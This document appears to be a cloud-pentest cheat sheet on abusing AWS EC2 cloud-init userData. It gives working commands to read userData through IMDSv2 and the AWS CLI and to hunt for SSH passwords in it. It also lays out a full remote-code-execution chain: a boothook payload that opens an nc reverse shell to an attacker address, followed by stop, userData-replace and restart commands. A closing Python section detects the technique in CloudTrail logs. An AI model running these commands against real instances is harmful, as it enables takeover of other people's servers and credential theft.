# cloud-init Exploits

## UserData section exploits

### Enumeration

#### On current EC2 instance

Read the following file (requires sudo or root privileges):

```
sudo cat /var/lib/cloud/instance/scripts/part-001
```

Query IMDS (IMDSv2) for the instance ID and region, then fetch the `userData` attribute with the AWS CLI:

```
# IMDSv2: obtain a session token, then read the instance ID and region
IMDS_TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ec2_instance_id=$(curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" http://169.254.169.254/latest/meta-data/instance-id)
ec2_region=$(curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" http://169.254.169.254/latest/meta-data/placement/region)
# userData is returned base64-encoded, so decode it
aws ec2 describe-instance-attribute --attribute userData --instance-id "$ec2_instance_id" --region "$ec2_region" --query UserData --output text | base64 -d
```

#### CloudShell

```
# the returned value is base64-encoded
aws ec2 describe-instance-attribute --attribute userData --instance-id <instance id> --region <region> --query UserData --output text | base64 -d
```

### Sensitive data

Look for SSH credentials embedded in cloud-config directives, for example:

```
ssh_pwauth: True   # SSH password authentication enabled
chpasswd:
  list: |
    <user>:<pass>
```

### Remote Code Execution

Create a reverse shell payload (saved here as `reverse-shell.txt`) as follows:

```
#cloud-boothook
#!/bin/bash -x
yum install -y nc && nc <ip> <port> -e /bin/bash
```

Base64-encode the file:

```
base64 reverse-shell.txt > reverse-shell.enc
```

Stop the instance and replace the userData attribute associated with it with the encoded payload:

```
aws ec2 stop-instances --profile <profile> --instance-ids <instance id>
aws ec2 modify-instance-attribute --profile <profile> --instance-id <instance id> --attribute userData --value file://reverse-shell.enc
```

Start the instance again to execute the payload. It may take a couple of minutes for the instance to come back up.

```
aws ec2 start-instances --profile <profile> --instance-ids <instance id>
```
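As an added defender-side example (not part of the original notes), the following Python audits a decoded `userData` blob for the credential directives and boothook marker shown above, and flags the stop, modify-userData, start sequence of this technique in CloudTrail-shaped records. The sample records and cloud-config are constructed, their `requestParameters` shapes are assumed, and the marker list is illustrative rather than exhaustive.

```python
import base64
from datetime import datetime, timedelta

# Markers to flag in decoded userData: the credential keys and boothook pattern above.
RISKY_MARKERS = ("#cloud-boothook", "ssh_pwauth", "chpasswd")

def audit_user_data(b64_user_data):
    """Decode the base64 userData attribute and list the risky markers it contains."""
    text = base64.b64decode(b64_user_data).decode("utf-8", errors="replace")
    return [m for m in RISKY_MARKERS if m in text]

def detect_userdata_swap(events, window_minutes=30):
    """Flag instances with Stop -> ModifyInstanceAttribute(userData) -> Start within the window."""
    timeline = {}  # instance id -> [(time, eventName), ...] in time order
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        name, params = ev["eventName"], ev.get("requestParameters", {})
        if name not in ("StopInstances", "ModifyInstanceAttribute", "StartInstances"):
            continue
        if name == "ModifyInstanceAttribute" and "userData" not in params:
            continue  # changes to other attributes are not this technique
        t = datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        # Stop/StartInstances carry instancesSet; ModifyInstanceAttribute carries instanceId (assumed shapes)
        ids = [params["instanceId"]] if "instanceId" in params else [
            i["instanceId"] for i in params.get("instancesSet", {}).get("items", [])]
        for iid in ids:
            timeline.setdefault(iid, []).append((t, name))
    flagged = []
    for iid, steps in timeline.items():
        names = [n for _, n in steps]
        try:  # first userData change, the last stop before it, the first start after it
            mod = names.index("ModifyInstanceAttribute")
            stop = max(i for i in range(mod) if names[i] == "StopInstances")
            start = names.index("StartInstances", mod)
        except ValueError:
            continue
        if steps[start][0] - steps[stop][0] <= timedelta(minutes=window_minutes):
            flagged.append(iid)
    return flagged

# Constructed inputs, not real instance data or logs; the instance ID is a placeholder.
SAMPLE_USER_DATA = base64.b64encode(
    b"#cloud-config\nssh_pwauth: True\nchpasswd:\n  list: |\n    user:pass\n").decode()
SAMPLE_EVENTS = [
    {"eventName": "StopInstances", "eventTime": "2024-01-01T10:00:00Z",
     "requestParameters": {"instancesSet": {"items": [{"instanceId": "i-0000aaaa"}]}}},
    {"eventName": "ModifyInstanceAttribute", "eventTime": "2024-01-01T10:02:00Z",
     "requestParameters": {"instanceId": "i-0000aaaa", "userData": {"value": "..."}}},
    {"eventName": "StartInstances", "eventTime": "2024-01-01T10:05:00Z",
     "requestParameters": {"instancesSet": {"items": [{"instanceId": "i-0000aaaa"}]}}},
]
```

Feed `detect_userdata_swap` the parsed `Records` of a CloudTrail log file and `audit_user_data` the `--query UserData --output text` value from the enumeration commands above.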
